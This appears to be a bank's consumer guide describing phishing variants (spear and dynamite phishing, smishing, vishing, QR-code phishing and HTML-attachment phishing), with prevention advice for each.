With classing phishing, the attackers are trying to lure their victims to a counterfeit website with the help of a faked e-mail and to get them to enter their log-in information (for instance account number, password) there.
Alternatively or additionally, they may also add mail attachments containing a Trojan. Once this attachment is opened, it installs itself in the background, proceeding to capture Internet users’ access details or directing them to fake websites.
Important to know: Financial institutions would never send out e-mails like that!
: Never click any links or attachments in e-mails, but always enter the financial institution’s address into your browser
manually, and check SSL
connection and certificate
Spear phishing and dynamite phishing
In contrast to classic phishing which involves large amounts of e-mails randomly sent to a broad public, with spear phishing, recipients are specifically chosen and receive e-mails personally tailored to them.
Senders take the guise of a trustworthy person here, often posing as an acquaintance, employee or business partner of the recipient. The personalised e-mail contents seem credible and authentic and are therefore not even recognised by spam filters at times.
If such personalised e-mails are created automatically and sent out en masse, we also call this “dynamite phishing”.
Prevention: Remain wary of unexpected e-mails or those with unusual contents, even if you think you know the sender. In case of doubt, contact the sender via a second channel, for instance by telephone.
SMS messages are increasingly used for phishing attacks, too. The perfidious thing about “smishing” is that most of the criteria suitable to recognise phishing e-mails cannot be used for SMS messages: There is usually no personal form of address. Language and design of these text messages are too simple and brief to allow any conclusions as to whether they are fake. And on most mobile devices, it is rather difficult or unreliable to check the true sender and the link. Many users are also used to receiving SMS messages to verify their e-banking log-in or before financial transactions are carried out.
Prevention: Never click on any links included in SMS messages, but manually enter the website address of your financial institution which you are familiar with into your browser. Then check there is a secure connection (lock symbol, target address). If you receive any unexpected SMS messages, contact your bank via the contact information you know (for instance their official telephone number) and have them confirm that they actually sent this SMS.
Vishing (voice phishing or phone phishing)
Vishing is the voice- or telephone-based version of phishing. Similar to classic phishing, a well thought-out story is employed to induce users to disclose confidential information, such as their log-in details for their e-banking facility.
Prevention: Never let other people know any of your confidential data, such as passwords. Immediately terminate any phone calls asking you for such details. Contact your financial institution only via their official telephone numbers.
With QR phishing, attackers simply stick their own QR codes (Quick Response codes) over those displayed in frequently visited places and direct gullible users to a fake URL. This way, it is easily possible to execute scripts or show a faked financial institution log-in page, in particular on mobile devices.
Prevention: Never use any QR codes to log into any financial institution site. Before scanning any QR codes please check whether they have not been covered up by a fake one. Check whether the link points to your desired address.
Phishing using websites in the attachment
When phishing using websites, no link or document is included in the e-mail you receive – instead, there is simply an HTM- or HTML file containing a fake website in the attachment. Victims are fooled, since there is no link to click on. And at first glance, the attached file doesn’t seem to be that dangerous either, as it isn’t an actual document (Word, Excel) which could for instance run some macros.
But caution! HTM and HTML files can redirect victims straight to the attacker’s server! Any log-in information then entered will end up in the wrong hands this way. In addition, such files can also contain scripts, which may just cause more damage.
Such redirects and scripts are blocked by the latest e-mail software for security reasons. If however you open such an HTM or HTML attachment, this is no longer controlled by the mail program’s security settings. This is extra-perfidious, since even users aware of phishing in general are duped, since the browser address line “only” shows a local file path and not a dubious URL the way it is displayed with classic phishing.
Prevention: Please be wary of any HTM or HTML attachments in general. Don’t click on any e-mail attachments, but always enter your financial institution’s address into your browser manually.